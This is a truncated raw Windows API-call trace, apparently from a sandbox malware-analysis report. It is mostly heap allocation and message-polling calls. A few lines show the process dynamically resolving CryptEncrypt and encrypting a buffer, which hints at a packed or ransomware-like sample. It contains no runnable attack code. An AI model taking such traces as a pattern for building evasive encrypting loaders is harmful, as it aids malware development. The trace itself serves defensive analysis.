[0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.088] CharLowerBuffW (in: lpsz="byte[21456]", cchLength=0xb | out: lpsz="byte[21456]") returned 0xb [0266.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.090] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.092] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0266.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.092] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25b88*, pdwDataLen=0x8cef60*=0x53c8, dwBufLen=0x53d0 | out: pbData=0x2f25b88*, pdwDataLen=0x8cef60*=0x53d0) returned 1 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0266.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0266.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0266.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0266.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0266.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0266.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0266.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f2af60 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53d0) returned 0x2f30338 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2af60 | out: hHeap=0x970000) returned 1 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 